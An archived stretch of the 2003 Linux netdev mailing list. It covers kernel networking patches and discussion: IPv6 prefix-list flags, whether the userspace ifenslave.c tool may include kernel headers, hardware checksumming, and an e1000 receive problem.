Please, apply also to 2.2 Regards -- Julian Anastasov From davem@redhat.com Wed Jul 16 00:27:06 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 16 Jul 2003 00:27:21 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6G7R5Fl007246 for ; Wed, 16 Jul 2003 00:27:06 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id AAA16134; Wed, 16 Jul 2003 00:17:24 -0700 Date: Wed, 16 Jul 2003 00:17:24 -0700 From: "David S. Miller" To: Julian Anastasov Cc: netdev@oss.sgi.com Subject: Re: [patches] invalid nh.raw use after free Message-Id: <20030716001724.7874a51a.davem@redhat.com> In-Reply-To: References: <20030715191709.1e0c6427.davem@redhat.com> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4098 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Wed, 16 Jul 2003 10:09:02 +0300 (EEST) Julian Anastasov wrote: > On Tue, 15 Jul 2003, David S. Miller wrote: > > > Good catch, I'll apply this. > > Please, apply also to 2.2 Please forward to Alan for that, I don't have the resources to maintain 2.2.x along with all the other stuff. 
From yoshfuji@linux-ipv6.org Wed Jul 16 01:37:58 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 16 Jul 2003 01:38:14 -0700 (PDT) Received: from yue.hongo.wide.ad.jp (yue.hongo.wide.ad.jp [203.178.139.94]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6G8buFl008314 for ; Wed, 16 Jul 2003 01:37:57 -0700 Received: from localhost (localhost [127.0.0.1]) by yue.hongo.wide.ad.jp (8.12.3+3.5Wbeta/8.12.3/Debian-5) with ESMTP id h6G8dRBo032450; Wed, 16 Jul 2003 17:39:28 +0900 Date: Wed, 16 Jul 2003 17:39:26 +0900 (JST) Message-Id: <20030716.173926.81875946.yoshfuji@linux-ipv6.org> To: kuznet@ms2.inr.ac.ru Cc: krkumar@us.ibm.com, davem@redhat.com, netdev@oss.sgi.com, yoshfuji@linux-ipv6.org, linux-net@vger.kernel.org Subject: Re: [PATCH 1/4] Prefix List against 2.5.73 From: YOSHIFUJI Hideaki / =?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?= In-Reply-To: <200307160021.EAA10195@dub.inr.ac.ru> References: <3F14492C.30708@us.ibm.com> <200307160021.EAA10195@dub.inr.ac.ru> Organization: USAGI Project X-URL: http://www.yoshifuji.org/%7Ehideaki/ X-Fingerprint: 90 22 65 EB 1E CF 3A D1 0B DF 80 D8 48 07 F8 94 E0 62 0E EA X-PGP-Key-URL: http://www.yoshifuji.org/%7Ehideaki/hideaki@yoshifuji.org.asc X-Face: "5$Al-.M>NJ%a'@hhZdQm:."qn~PA^gq4o*>iCFToq*bAi#4FRtx}enhuQKz7fNqQz\BYU] $~O_5m-9'}MIs`XGwIEscw;e5b>n"B_?j/AkL~i/MEaZBLP X-Mailer: Mew version 2.2 on Emacs 20.7 / Mule 4.1 (AOI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 4099 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: yoshfuji@linux-ipv6.org Precedence: bulk X-list: netdev Hello. In article <200307160021.EAA10195@dub.inr.ac.ru> (at Wed, 16 Jul 2003 04:21:33 +0400 (MSD)), kuznet@ms2.inr.ac.ru says: > Select yourself: either IFA_IFFLAGS or translated flags in ifa_flags. 
> I prefer the second way just because it is too unpleasant to add > a new attribute for sake of two bits with no visible candidates > to use remaining ones. Well, I dislike ifa_flags because - it is conceptually wrong to combine them. e.g. even if all autoconf addresses expired, flags lasts and we should report it to userspace. - ifa_flags is extremely expensive resource. There are only 8 bits. Use it only for addresses. My suggestion is: - create L3 per-interface RTM, say, RTM_xxxIFACE. - provide inet_device / inet6_dev things via this RTM. e.g. per-interface statistics, flags etc. -- Hideaki YOSHIFUJI @ USAGI Project GPG FP: 9022 65EB 1ECF 3AD1 0BDF 80D8 4807 F894 E062 0EEA From mmj@suse.de Wed Jul 16 02:24:01 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 16 Jul 2003 02:24:08 -0700 (PDT) Received: from Cantor.suse.de (ns.suse.de [213.95.15.193]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6G9O0Fl010571 for ; Wed, 16 Jul 2003 02:24:01 -0700 Received: from Hermes.suse.de (Hermes.suse.de [213.95.15.136]) by Cantor.suse.de (Postfix) with ESMTP id 9F99E1460E; Wed, 16 Jul 2003 11:23:54 +0200 (MEST) Date: Wed, 16 Jul 2003 11:23:54 +0200 From: Mads Martin =?iso-8859-1?Q?J=F8rgensen?= To: "David S. Miller" Cc: netdev@oss.sgi.com Subject: /usr/src/linux/Documentation/networking/ifenslave.c Message-ID: <20030716092354.GC24077@suse.de> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.4i X-archive-position: 4100 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: mmj@suse.de Precedence: bulk X-list: netdev $SUBJECT is a userspace tool, but includes kernel headers. This small obvious patch against 2.6.0-test1 should fix it. 
--- ifenslave.c
+++ ifenslave.c
@@ -97,8 +97,7 @@
 #include
 #include
 #include
-#include
-#include
+#include
 #include
 #include
 #include
-- Mads Martin Joergensen, http://mmj.dk "Why make things difficult, when it is possible to make them cryptic and totally illogical, with just a little bit more effort?" -- A. P. J. From davem@redhat.com Wed Jul 16 05:52:25 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 16 Jul 2003 05:52:34 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6GCqOFl017025 for ; Wed, 16 Jul 2003 05:52:25 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id FAA22146; Wed, 16 Jul 2003 05:42:55 -0700 Date: Wed, 16 Jul 2003 05:42:55 -0700 From: "David S. Miller" To: Mads Martin =?ISO-8859-1?Q?J=F8rgensen?= Cc: netdev@oss.sgi.com Subject: Re: /usr/src/linux/Documentation/networking/ifenslave.c Message-Id: <20030716054255.1922d299.davem@redhat.com> In-Reply-To: <20030716092354.GC24077@suse.de> References: <20030716092354.GC24077@suse.de> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by oss.sgi.com id h6GCqOFl017025 X-archive-position: 4101 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Wed, 16 Jul 2003 11:23:54 +0200 Mads Martin Jørgensen wrote: > $SUBJECT is a userspace tool, but includes kernel headers. This small > obvious patch against 2.6.0-test1 should fix it. This patch is absolutely senseless, you eliminate two such includes
> -#include
> -#include
> +#include
but three more still remain.
> #include
> #include
> #include
This whole anti-kernel-headers-in-userspace thing is a total shaman's dance and not founded in reality. Quick, answer this as fast as you can, where in the glibc headers can you get at the PFKEY and XFRM_NETLINK interface definitions to configure IPSEC stuff in the kernel? BZZT, time is up, and I know you have no answer :-) That is why all of this is ridiculous. From mmj@suse.de Wed Jul 16 05:59:18 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 16 Jul 2003 05:59:22 -0700 (PDT) Received: from Cantor.suse.de (ns.suse.de [213.95.15.193]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6GCxFFl017851 for ; Wed, 16 Jul 2003 05:59:17 -0700 Received: from Hermes.suse.de (Hermes.suse.de [213.95.15.136]) by Cantor.suse.de (Postfix) with ESMTP id 94A5B14485; Wed, 16 Jul 2003 14:59:10 +0200 (MEST) Date: Wed, 16 Jul 2003 14:59:10 +0200 From: Mads Martin =?iso-8859-1?Q?J=F8rgensen?= To: "David S. Miller" Cc: netdev@oss.sgi.com Subject: Re: /usr/src/linux/Documentation/networking/ifenslave.c Message-ID: <20030716125910.GB10817@suse.de> References: <20030716092354.GC24077@suse.de> <20030716054255.1922d299.davem@redhat.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20030716054255.1922d299.davem@redhat.com> User-Agent: Mutt/1.4i X-archive-position: 4102 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: mmj@suse.de Precedence: bulk X-list: netdev * David S. Miller [Jul 16. 2003 14:52]: > This whole anti-kernel-headers-in-userspace thing is a > total shaman's dance and not founded in reality. Urgs. > Quick, answer this as fast as you can, where in the glibc headers can > you get at the PFKEY and XFRM_NETLINK interface definitions to > configure IPSEC stuff in the kernel? > > BZZT, time is up, and I know you have no answer :-) :-) > That is why all of this is ridiculous.
Problem is some of these includes are different on different archs, and causes the thing to miscompile. How to fix that then? -- Mads Martin Joergensen, http://mmj.dk "Why make things difficult, when it is possible to make them cryptic and totally illogical, with just a little bit more effort?" -- A. P. J. From ralph@istop.com Wed Jul 16 06:03:24 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 16 Jul 2003 06:03:29 -0700 (PDT) Received: from smtp.istop.com (dci.doncaster.on.ca [66.11.168.194]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6GD3EFl018249 for ; Wed, 16 Jul 2003 06:03:14 -0700 Received: from ns.istop.com (ns.istop.com [66.11.168.199]) by smtp.istop.com (Postfix) with ESMTP id 05D9536993; Wed, 16 Jul 2003 08:33:05 -0400 (EDT) Date: Wed, 16 Jul 2003 08:33:04 -0400 (EDT) From: Ralph Doncaster Reply-To: ralph+d@istop.com To: Jeff Garzik Cc: Dan Hollis , linux-netdev Subject: Re: [Bonding-devel] Re: [RFC][bonding] Improve VLAN support on top of bonding In-Reply-To: <3F14807E.30402@pobox.com> Message-ID: References: <3F14807E.30402@pobox.com> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 4103 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: ralph@istop.com Precedence: bulk X-list: netdev On Tue, 15 Jul 2003, Jeff Garzik wrote: > Ralph Doncaster wrote: > > On Tue, 15 Jul 2003, Dan Hollis wrote: > > > > > >>That is exactly what it does. hw tcp checksumming helps a LOT at gbe rates > > > > > > This still doesn't make any sense. The copy from user-space to kernel > > space does the checksum as far as I recall (unless you use the > > router-not-host kernel build option). > > > Not for the zero-copy case. How common is this? As far as I can tell, Apache 1.3 doesn't use sendfile (you need 2.0 for that). And even if 1.3 is using EnableMMAP with a large write, you're limited to the size of SO_SNDBUF (or maybe only a single page?). 
This is not to say hw csum is a bad thing. I think the Linux IP stack should support it. When I was looking at the 2.4.19 code I noticed the 3c59x driver code supported hw csum, but I couldn't find anything in the IP stack that used the csum flags set by the driver... -Ralph From davem@redhat.com Wed Jul 16 06:19:43 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 16 Jul 2003 06:19:52 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6GDJgFl018790 for ; Wed, 16 Jul 2003 06:19:43 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id GAA22258; Wed, 16 Jul 2003 06:10:14 -0700 Date: Wed, 16 Jul 2003 06:10:13 -0700 From: "David S. Miller" To: Mads Martin =?ISO-8859-1?Q?J=F8rgensen?= Cc: netdev@oss.sgi.com Subject: Re: /usr/src/linux/Documentation/networking/ifenslave.c Message-Id: <20030716061013.64f14a04.davem@redhat.com> In-Reply-To: <20030716125910.GB10817@suse.de> References: <20030716092354.GC24077@suse.de> <20030716054255.1922d299.davem@redhat.com> <20030716125910.GB10817@suse.de> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by oss.sgi.com id h6GDJgFl018790 X-archive-position: 4104 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Wed, 16 Jul 2003 14:59:10 +0200 Mads Martin Jørgensen wrote: > > That is why all of this is ridiculous. > > Problem is some of these includes are different on different archs, and > causes the thing to miscompile. How to fix that then? Nothing arch specific resides in linux/if.h :-) This means the problem emanates from asm/*.h headers which is where the fixes belong.
What exactly is the error you get on ia64? From mmj@suse.de Wed Jul 16 06:35:21 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 16 Jul 2003 06:35:28 -0700 (PDT) Received: from Cantor.suse.de (ns.suse.de [213.95.15.193]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6GDZKFl019354 for ; Wed, 16 Jul 2003 06:35:21 -0700 Received: from Hermes.suse.de (Hermes.suse.de [213.95.15.136]) by Cantor.suse.de (Postfix) with ESMTP id 35AB014646; Wed, 16 Jul 2003 15:35:15 +0200 (MEST) Date: Wed, 16 Jul 2003 15:35:14 +0200 From: Mads Martin =?iso-8859-1?Q?J=F8rgensen?= To: "David S. Miller" Cc: netdev@oss.sgi.com Subject: Re: /usr/src/linux/Documentation/networking/ifenslave.c Message-ID: <20030716133514.GB7184@suse.de> References: <20030716092354.GC24077@suse.de> <20030716054255.1922d299.davem@redhat.com> <20030716125910.GB10817@suse.de> <20030716061013.64f14a04.davem@redhat.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20030716061013.64f14a04.davem@redhat.com> User-Agent: Mutt/1.5.4i X-archive-position: 4105 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: mmj@suse.de Precedence: bulk X-list: netdev * David S. Miller [Jul 16. 2003 15:21]: > > > That is why all of this is ridiculous. > > > > Problem is some of these includes are different on different archs, and > > causes the thing to miscompile. How to fix that then? > > Nothing arch specific resides in linux/if.h :-) > > This means the problem emanates from asm/*.h headers which is > where the fixes belong. Yes. What fix would you propose? > What exactly is the error you get on ia64?
a bunch of compile errors like the following:

In file included from /usr/src/linux/include/asm/system.h:19,
                 from /usr/src/linux/include/asm/atomic.h:17,
                 from /usr/src/linux/include/linux/netdevice.h:32,
                 from /usr/src/linux/include/linux/if_arp.h:26,
                 from ifenslave.c:91:
/usr/src/linux/include/asm/pal.h:89: parse error before "pal_status_t"
/usr/src/linux/include/asm/pal.h:89: warning: type defaults to `int' in declaration of `pal_status_t'
/usr/src/linux/include/asm/pal.h:89: warning: data definition has no type or storage class
/usr/src/linux/include/asm/pal.h:102: parse error before "pal_cache_level_t"
/usr/src/linux/include/asm/pal.h:102: warning: type defaults to `int' in declaration of `pal_cache_level_t'
/usr/src/linux/include/asm/pal.h:102: warning: data definition has no type or storage class
/usr/src/linux/include/asm/pal.h:110: parse error before "pal_cache_type_t"
/usr/src/linux/include/asm/pal.h:110: warning: type defaults to `int' in declaration of `pal_cache_type_t'
/usr/src/linux/include/asm/pal.h:110: warning: data definition has no type or storage class
/usr/src/linux/include/asm/pal.h:123: parse error before "pal_cache_line_state_t

etc. thanks, -- Mads Martin Joergensen, http://mmj.dk "Why make things difficult, when it is possible to make them cryptic and totally illogical, with just a little bit more effort?" -- A. P. J. From davem@redhat.com Wed Jul 16 06:38:02 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 16 Jul 2003 06:38:15 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6GDc1Fl019714 for ; Wed, 16 Jul 2003 06:38:02 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id GAA22350; Wed, 16 Jul 2003 06:28:33 -0700 Date: Wed, 16 Jul 2003 06:28:33 -0700 From: "David S.
Miller" To: Mads Martin =?ISO-8859-1?Q?J=F8rgensen?= Cc: netdev@oss.sgi.com Subject: Re: /usr/src/linux/Documentation/networking/ifenslave.c Message-Id: <20030716062833.2c25906f.davem@redhat.com> In-Reply-To: <20030716133514.GB7184@suse.de> References: <20030716092354.GC24077@suse.de> <20030716054255.1922d299.davem@redhat.com> <20030716125910.GB10817@suse.de> <20030716061013.64f14a04.davem@redhat.com> <20030716133514.GB7184@suse.de> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by oss.sgi.com id h6GDc1Fl019714 X-archive-position: 4106 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Wed, 16 Jul 2003 15:35:14 +0200 Mads Martin Jørgensen wrote: > * David S. Miller [Jul 16. 2003 15:21]: > In file included from /usr/src/linux/include/asm/system.h:19, > from /usr/src/linux/include/asm/atomic.h:17, > from /usr/src/linux/include/linux/netdevice.h:32, > from /usr/src/linux/include/linux/if_arp.h:26, > from ifenslave.c:91: > /usr/src/linux/include/asm/pal.h:89: parse error before "pal_status_t" IA64 needs its __KERNEL__ ifdefs fixed up, nothing more. Thanks for finding the right place to fix this problem :-) From garzik@gtf.org Wed Jul 16 07:12:13 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 16 Jul 2003 07:12:19 -0700 (PDT) Received: from havoc.gtf.org (host-64-213-145-173.atlantasolutions.com [64.213.145.173] (may be forged)) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6GECCFl020577 for ; Wed, 16 Jul 2003 07:12:13 -0700 Received: by havoc.gtf.org (Postfix, from userid 500) id A5A866649; Wed, 16 Jul 2003 10:12:06 -0400 (EDT) Date: Wed, 16 Jul 2003 10:12:06 -0400 From: Jeff Garzik To: "David S.
Miller" Cc: Mads Martin Jørgensen , netdev@oss.sgi.com Subject: Re: /usr/src/linux/Documentation/networking/ifenslave.c Message-ID: <20030716141206.GB5628@gtf.org> References: <20030716092354.GC24077@suse.de> <20030716054255.1922d299.davem@redhat.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20030716054255.1922d299.davem@redhat.com> User-Agent: Mutt/1.3.28i X-archive-position: 4107 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jgarzik@pobox.com Precedence: bulk X-list: netdev On Wed, Jul 16, 2003 at 05:42:55AM -0700, David S. Miller wrote: > This whole anti-kernel-headers-in-userspace thing is a > total shaman's dance and not founded in reality. There ARE definitions that differ between kernel and userspace. Thinking they are the same is not founded in reality. And thinking that all of userspace is instantly recompiled against the latest kernel headers isn't founded in reality, either. Jeff From davem@redhat.com Wed Jul 16 07:24:06 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 16 Jul 2003 07:24:10 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6GEO1Fl021013 for ; Wed, 16 Jul 2003 07:24:06 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id HAA22530; Wed, 16 Jul 2003 07:14:26 -0700 Date: Wed, 16 Jul 2003 07:14:26 -0700 From: "David S.
Miller" To: Jeff Garzik Cc: mmj@suse.de, netdev@oss.sgi.com Subject: Re: /usr/src/linux/Documentation/networking/ifenslave.c Message-Id: <20030716071426.11449bed.davem@redhat.com> In-Reply-To: <20030716141206.GB5628@gtf.org> References: <20030716092354.GC24077@suse.de> <20030716054255.1922d299.davem@redhat.com> <20030716141206.GB5628@gtf.org> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4108 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Wed, 16 Jul 2003 10:12:06 -0400 Jeff Garzik wrote: > There ARE definitions that differ between kernel and userspace. Sure, but none of the ones we're talking about here. > Thinking they are the same is not founded in reality. I'm not. > And thinking that all of userspace is instantly recompiled against > the latest kernel headers isn't founded in reality, either. GLIBC is munging netlink messages on the way out via sendmsg()? That'd be news to me. :-) From mdharm@ziggy.one-eyed-alien.net Wed Jul 16 09:37:48 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 16 Jul 2003 09:38:24 -0700 (PDT) Received: from ziggy.one-eyed-alien.net (IDENT:root@ziggy.one-eyed-alien.net [64.169.228.100]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6GGbPFl024209 for ; Wed, 16 Jul 2003 09:37:48 -0700 Received: (from mdharm@localhost) by ziggy.one-eyed-alien.net (8.11.6/8.11.6) id h6GGRd517790 for netdev@oss.sgi.com; Wed, 16 Jul 2003 09:27:39 -0700 Date: Wed, 16 Jul 2003 09:27:39 -0700 From: Matthew Dharm To: netdev@oss.sgi.com Subject: e1000 with 82546EB parts on 2.4?
Message-ID: <20030716092739.C17580@one-eyed-alien.net> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="jy6Sn24JjFx/iggw" Content-Disposition: inline User-Agent: Mutt/1.2.5i Organization: One Eyed Alien Networks X-Copyright: (C) 2003 Matthew Dharm, all rights reserved. X-Message-Flag: Get a real e-mail client. http://www.mutt.org/ X-archive-position: 4109 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: mdharm-kernel@one-eyed-alien.net Precedence: bulk X-list: netdev --jy6Sn24JjFx/iggw Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable I'm working with some hardware that may or may not be completely reliable, and trying to figure out if something I'm seeing is a 'known issue' or something strange about my setup (which is entirely possible). I'm using 2.4.20 with some custom hardware. What I've got is your basic x86 machine with an Intel 82546EB dual-GigE controller on a PCI bus. I load e1000.o, ifconfig, and I'm running. The interface is solid as a rock, AFAICT. I've left it running for days without any problems. However, if I ifdown and then ifup the interface, I'm borked. Based on tcpdump from another machine, the interface is definitely transmitting packets just fine. But, it never seems to notice any packets on the receive side. Has anyone seen anything like this before? Matt -- Matthew Dharm Home: mdharm-usb@one-eyed-alien.net Maintainer, Linux USB Mass Storage Driver A: The most ironic oxymoron wins ... DP: "Microsoft Works" A: Uh, okay, you win. -- A.J.
& Dust Puppy User Friendly, 1/18/1998 --jy6Sn24JjFx/iggw Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: For info see http://www.gnupg.org iD4DBQE/FXz7IjReC7bSPZARAm3QAJ9FXGauZb+6KBBODke+zBhA/GFf+QCYv+Mh J95mPS67nP0emQlE47bxVg== =FxNQ -----END PGP SIGNATURE----- --jy6Sn24JjFx/iggw-- From krkumar@us.ibm.com Wed Jul 16 11:44:59 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 16 Jul 2003 11:45:11 -0700 (PDT) Received: from e35.co.us.ibm.com (e35.co.us.ibm.com [32.97.110.133]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6GIiqFl027081 for ; Wed, 16 Jul 2003 11:44:59 -0700 Received: from westrelay02.boulder.ibm.com (westrelay02.boulder.ibm.com [9.17.195.11]) by e35.co.us.ibm.com (8.12.9/8.12.2) with ESMTP id h6GIhxc8225008; Wed, 16 Jul 2003 14:43:59 -0400 Received: from DYN318430.beaverton.ibm.com (d03av02.boulder.ibm.com [9.17.193.82]) by westrelay02.boulder.ibm.com (8.12.9/NCO/VER6.5) with ESMTP id h6GIhqMc130282; Wed, 16 Jul 2003 12:43:52 -0600 Date: Wed, 16 Jul 2003 11:42:33 -0700 (PDT) From: Krishna Kumar X-X-Sender: krkumar@DYN318430.beaverton.ibm.com To: YOSHIFUJI Hideaki / =?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?= cc: kuznet@ms2.inr.ac.ru, , , Subject: [PATCH 1/2] Prefix List against 2.5.73 In-Reply-To: <20030716.173926.81875946.yoshfuji@linux-ipv6.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 4110 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: krkumar@us.ibm.com Precedence: bulk X-list: netdev Hi, > > Select yourself: either IFA_IFFLAGS or translated flags in ifa_flags. > > I prefer the second way just because it is too unpleasant to add > > a new attribute for sake of two bits with no visible candidates > > to use remaining ones. > > Well, I dislike ifa_flags because > - it is conceptually wrong to combine them. > e.g. 
even if all autoconf addresses expired, flags lasts and > we should report it to userspace. > - ifa_flags is extremely expensive resource. > There are only 8 bits. Use it only for addresses. Well, I tend to agree with Alexey since we don't need a lot of extra data support for providing 2 bits. The advantage with this approach is that the unmodified ip util can display the flags correctly after it removes the address specific flags. Going by the other approach, we need to support a new type to get this information (IFA_IFFLAGS). If the number of bits is considered important, then it is possible to just return the 6 bits (ignore the RS* bits). I feel this is the less complicated of the two ways. So at this time, I am sending the patch for 2.5.73 (is this too old?) using Alexey's suggestion. The patch for 2.4.21 follows separately. Thanks, - KK diff -ruN linux-2.5.73.org/include/linux/ipv6_route.h test/linux-2.5.73/include/linux/ipv6_route.h --- linux-2.5.73.org/include/linux/ipv6_route.h 2003-06-22 11:32:36.000000000 -0700 +++ test/linux-2.5.73/include/linux/ipv6_route.h 2003-07-15 10:38:31.000000000 -0700 @@ -16,6 +16,7 @@ #define RTF_DEFAULT 0x00010000 /* default - learned via ND */ #define RTF_ALLONLINK 0x00020000 /* fallback, no routers on link */ #define RTF_ADDRCONF 0x00040000 /* addrconf route - RA */ +#define RTF_PREFIX_RT 0x00080000 /* A prefix only route - RA */ #define RTF_NONEXTHOP 0x00200000 /* route with no nexthop */ #define RTF_EXPIRES 0x00400000 @@ -44,4 +45,16 @@ #define RTMSG_NEWROUTE 0x21 #define RTMSG_DELROUTE 0x22 +/* + * Return entire prefix list in array of following structures. Provides the + * prefix and prefix length for all devices.
+ */ + +struct in6_prefix_msg +{ + int ifindex; + int prefix_len; + struct in6_addr prefix; +}; + #endif diff -ruN linux-2.5.73.org/include/linux/rtnetlink.h test/linux-2.5.73/include/linux/rtnetlink.h --- linux-2.5.73.org/include/linux/rtnetlink.h 2003-06-22 11:33:07.000000000 -0700 +++ test/linux-2.5.73/include/linux/rtnetlink.h 2003-07-16 10:58:19.000000000 -0700 @@ -168,6 +168,7 @@ #define RTM_F_NOTIFY 0x100 /* Notify user of route change */ #define RTM_F_CLONED 0x200 /* This route is cloned */ #define RTM_F_EQUALIZE 0x400 /* Multipath equalizer: NI */ +#define RTM_F_PREFIX 0x800 /* Prefix addresses */ /* Reserved table identifiers */ diff -ruN linux-2.5.73.org/include/net/if_inet6.h test/linux-2.5.73/include/net/if_inet6.h --- linux-2.5.73.org/include/net/if_inet6.h 2003-06-22 11:33:32.000000000 -0700 +++ test/linux-2.5.73/include/net/if_inet6.h 2003-07-16 09:55:25.000000000 -0700 @@ -17,7 +17,9 @@ #include -#define IF_RA_RCVD 0x20 +#define IF_RA_OTHERCONF 0x02 +#define IF_RA_MANAGED 0x04 +#define IF_RA_RCVD 0x08 #define IF_RS_SENT 0x10 #ifdef __KERNEL__ diff -ruN linux-2.5.73.org/net/ipv6/addrconf.c test/linux-2.5.73/net/ipv6/addrconf.c --- linux-2.5.73.org/net/ipv6/addrconf.c 2003-06-22 11:33:17.000000000 -0700 +++ test/linux-2.5.73/net/ipv6/addrconf.c 2003-07-16 11:01:10.000000000 -0700 @@ -129,7 +129,7 @@ static int addrconf_ifdown(struct net_device *dev, int how); -static void addrconf_dad_start(struct inet6_ifaddr *ifp); +static void addrconf_dad_start(struct inet6_ifaddr *ifp, int flags); static void addrconf_dad_timer(unsigned long data); static void addrconf_dad_completed(struct inet6_ifaddr *ifp); static void addrconf_rs_timer(unsigned long data); @@ -715,7 +715,7 @@ ift->prefered_lft = tmp_prefered_lft; ift->tstamp = ifp->tstamp; spin_unlock_bh(&ift->lock); - addrconf_dad_start(ift); + 